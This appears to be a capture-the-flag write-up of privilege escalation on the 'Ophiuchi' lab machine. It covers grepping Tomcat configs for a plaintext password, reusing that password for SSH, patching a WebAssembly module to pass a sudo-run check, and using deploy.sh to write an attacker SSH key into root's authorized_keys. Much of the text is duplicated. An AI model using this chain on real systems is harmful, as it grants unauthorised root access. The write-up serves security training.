4 privesc

Tomcat config files are located under $TOMCAT_HOME/conf/

tomcat@ophiuchi:~/conf$ grep -rnw . -ie password --color=auto --color=always 2>/dev/null
<ie password --color=auto --color=always 2>/dev/null
./tomcat-users.xml:22:<user username="admin" password="whythereisalimit" roles="manager-gui,admin-gui"/>
./tomcat-users.xml:26:  you must define such a user - the username and password are arbitrary. It is
./tomcat-users.xml:41:  <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
./tomcat-users.xml:42:  <user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
./tomcat-users.xml:43:  <user username="role1" password="<must-be-changed>" roles="role1"/>
./tomcat-users.xsd:45:            <xs:attribute name="password" type="xs:string" />


./tomcat-users.xml:22:<user username="admin" password="whythereisalimit" roles="manager-gui,admin-gui"/>

We can try SSH using admin:whythereisalimit

$ ssh admin@10.10.10.227

admin@ophiuchi:~$ whoami;id
admin
uid=1000(admin) gid=1000(admin) groups=1000(admin)

admin@ophiuchi:~$ sudo -l
Matching Defaults entries for admin on ophiuchi:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User admin may run the following commands on ophiuchi:
    (ALL) NOPASSWD: /usr/bin/go run /opt/wasm-functions/index.go

admin@ophiuchi:/opt/wasm-functions$ ls -la
total 3928
drwxr-xr-x 3 root root    4096 Oct 14  2020 .
drwxr-xr-x 5 root root    4096 Oct 14  2020 ..
drwxr-xr-x 2 root root    4096 Oct 14  2020 backup
-rw-r--r-- 1 root root      88 Oct 14  2020 deploy.sh
-rwxr-xr-x 1 root root 2516736 Oct 14  2020 index
-rw-rw-r-- 1 root root     522 Oct 14  2020 index.go
-rwxrwxr-x 1 root root 1479371 Oct 14  2020 main.wasm

admin@ophiuchi:/opt/wasm-functions$ cat index.go
package main
import (
        "fmt"
        wasm "github.com/wasmerio/wasmer-go/wasmer"
        "os/exec"
        "log"
)
func main() {
        bytes, _ := wasm.ReadBytes("main.wasm")

        instance, _ := wasm.NewInstance(bytes)
        defer instance.Close()
        init := instance.Exports["info"]
        result,_ := init()
        f := result.String()
        if (f != "1") {
                fmt.Println("Not ready to deploy")
        } else {
                fmt.Println("Ready to deploy")
                out, err := exec.Command("/bin/sh", "deploy.sh").Output()
                if err != nil {
                        log.Fatal(err)
                }
                fmt.Println(string(out))
        }
}


Searching online came across WebAssemblyToolkit (https://github.com/WebAssembly/wabt)
Using this we can change main.wasm to readable formats (wat)
https://developer.mozilla.org/en-US/docs/WebAssembly/Understanding_the_text_format

Using wasm2wat

$ wasm2wat main.wasm -o main.wat
(module
  (type (;0;) (func (result i32)))
  (func $info (type 0) (result i32) i32.const 0)
  (table (;0;) 1 1 funcref)
  (memory (;0;) 16)
  (global (;0;) (mut i32) (i32.const 1048576))
  (global (;1;) i32 (i32.const 1048576))
  (global (;2;) i32 (i32.const 1048576))
  (export "memory" (memory 0))
  (export "info" (func $info))
  (export "__data_end" (global 1))
  (export "__heap_base" (global 2)))
  
(func $info (type 0) (result i32) i32.const 0)
shows function info returns a const 0 > changing it to 1
(func $info (type 0) (result i32) i32.const 1)

# converting back to wasm format
$ wat2wasm main.wat -o main.wasm

# file: deploy.sh
#!/bin/bash
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCmqb255DdKZBq3Wmr+T97/PP59bthxaIVAxbgRvjOd3HuFT28oMTaPx80lpA1A/dGD8AtBIoIPby23eyrW9zeUVwccQL/eb2+j2yjRxZx/mj/NFwpPUXp5sJTqC+dm3CScuNDDP5TGsy7wvvJbA9twqaSy7OxpO8fpPlHHwJqV1pVQ7VRRxwK6Fx/1x6VkOCkqsBOwL29mfU6PmMfi96yxDHAbMz6ib6xwnFsy8N+KOEX3L+U02TmGMSEUKr45xoIeMI9kaSIzNkPXilLbw7xrYDQZmwyuLNqsUEUy6haawVLUFAo98xY854AxVkLdoHTqZG/GVYlAQIKhzgVop9105VN4JRBU3CayP/9QLTLr+Ho1BDv7pyye9sSWXxZj8mVha9B2v7UPxUMm8nGlV51rrsgShCccDw3wVCKblsD1k+l5Uv5SuCP/cWnSrvsfZT+CsABpa3O36UTmtwhCmunmvchTnO7XAmDlffDaXMXpWubuDoHEtSWPT4ePqEODX3U= kashz@kali" > /root/.ssh/authorized_keys
echo "Copy Success"

# copy both files back

admin@ophiuchi:/tmp$ chmod 755 main.wasm
admin@ophiuchi:/tmp$ chmod 777 deploy.sh
admin@ophiuchi:/tmp$ export PATH="/tmp:$PATH"

admin@ophiuchi:/tmp$ sudo /usr/bin/go run /opt/wasm-functions/index.go
Ready to deploy
Copy Success


$ ssh -i id_rsa root@10.10.10.227
root@ophiuchi:~# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)

PreviousOPHIUCHI Next3 yaml deserialization exploit

Last updated 3 years ago

Tomcat config files are located under $TOMCAT_HOME/conf/ tomcat@ophiuchi:~/conf$ grep -rnw . -ie password --color=auto --color=always 2>/dev/null <ie password --color=auto --color=always 2>/dev/null ./tomcat-users.xml:22:<user username="admin" password="whythereisalimit" roles="manager-gui,admin-gui"/> ./tomcat-users.xml:26: you must define such a user - the username and password are arbitrary. It is ./tomcat-users.xml:41: <user username="tomcat" password="<must-be-changed>" roles="tomcat"/> ./tomcat-users.xml:42: <user username="both" password="<must-be-changed>" roles="tomcat,role1"/> ./tomcat-users.xml:43: <user username="role1" password="<must-be-changed>" roles="role1"/> ./tomcat-users.xsd:45: <xs:attribute name="password" type="xs:string" /> ./tomcat-users.xml:22:<user username="admin" password="whythereisalimit" roles="manager-gui,admin-gui"/> We can try SSH using admin:whythereisalimit $ ssh admin@10.10.10.227 admin@ophiuchi:~$ whoami;id admin uid=1000(admin) gid=1000(admin) groups=1000(admin) admin@ophiuchi:~$ sudo -l Matching Defaults entries for admin on ophiuchi: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User admin may run the following commands on ophiuchi: (ALL) NOPASSWD: /usr/bin/go run /opt/wasm-functions/index.go admin@ophiuchi:/opt/wasm-functions$ ls -la total 3928 drwxr-xr-x 3 root root 4096 Oct 14 2020 . drwxr-xr-x 5 root root 4096 Oct 14 2020 .. drwxr-xr-x 2 root root 4096 Oct 14 2020 backup -rw-r--r-- 1 root root 88 Oct 14 2020 deploy.sh -rwxr-xr-x 1 root root 2516736 Oct 14 2020 index -rw-rw-r-- 1 root root 522 Oct 14 2020 index.go -rwxrwxr-x 1 root root 1479371 Oct 14 2020 main.wasm admin@ophiuchi:/opt/wasm-functions$ cat index.go package main import ( "fmt" wasm "github.com/wasmerio/wasmer-go/wasmer" "os/exec" "log" ) func main() { bytes, _ := wasm.ReadBytes("main.wasm") instance, _ := wasm.NewInstance(bytes) defer instance.Close() init := instance.Exports["info"] result,_ := init() f := result.String() if (f != "1") { fmt.Println("Not ready to deploy") } else { fmt.Println("Ready to deploy") out, err := exec.Command("/bin/sh", "deploy.sh").Output() if err != nil { log.Fatal(err) } fmt.Println(string(out)) } } Searching online came across WebAssemblyToolkit (https://github.com/WebAssembly/wabt) Using this we can change main.wasm to readable formats (wat) https://developer.mozilla.org/en-US/docs/WebAssembly/Understanding_the_text_format

Using wasm2wat

$ wasm2wat main.wasm -o main.wat
(module
  (type (;0;) (func (result i32)))
  (func $info (type 0) (result i32) i32.const 0)
  (table (;0;) 1 1 funcref)
  (memory (;0;) 16)
  (global (;0;) (mut i32) (i32.const 1048576))
  (global (;1;) i32 (i32.const 1048576))
  (global (;2;) i32 (i32.const 1048576))
  (export "memory" (memory 0))
  (export "info" (func $info))
  (export "__data_end" (global 1))
  (export "__heap_base" (global 2)))
  
(func $info (type 0) (result i32) i32.const 0)
shows function info returns a const 0 > changing it to 1
(func $info (type 0) (result i32) i32.const 1)

# converting back to wasm format
$ wat2wasm main.wat -o main.wasm

# file: deploy.sh
#!/bin/bash
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCmqb255DdKZBq3Wmr+T97/PP59bthxaIVAxbgRvjOd3HuFT28oMTaPx80lpA1A/dGD8AtBIoIPby23eyrW9zeUVwccQL/eb2+j2yjRxZx/mj/NFwpPUXp5sJTqC+dm3CScuNDDP5TGsy7wvvJbA9twqaSy7OxpO8fpPlHHwJqV1pVQ7VRRxwK6Fx/1x6VkOCkqsBOwL29mfU6PmMfi96yxDHAbMz6ib6xwnFsy8N+KOEX3L+U02TmGMSEUKr45xoIeMI9kaSIzNkPXilLbw7xrYDQZmwyuLNqsUEUy6haawVLUFAo98xY854AxVkLdoHTqZG/GVYlAQIKhzgVop9105VN4JRBU3CayP/9QLTLr+Ho1BDv7pyye9sSWXxZj8mVha9B2v7UPxUMm8nGlV51rrsgShCccDw3wVCKblsD1k+l5Uv5SuCP/cWnSrvsfZT+CsABpa3O36UTmtwhCmunmvchTnO7XAmDlffDaXMXpWubuDoHEtSWPT4ePqEODX3U= kashz@kali" > /root/.ssh/authorized_keys
echo "Copy Success"

# copy both files back

admin@ophiuchi:/tmp$ chmod 755 main.wasm
admin@ophiuchi:/tmp$ chmod 777 deploy.sh
admin@ophiuchi:/tmp$ export PATH="/tmp:$PATH"

admin@ophiuchi:/tmp$ sudo /usr/bin/go run /opt/wasm-functions/index.go
Ready to deploy
Copy Success


$ ssh -i id_rsa root@10.10.10.227
root@ophiuchi:~# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)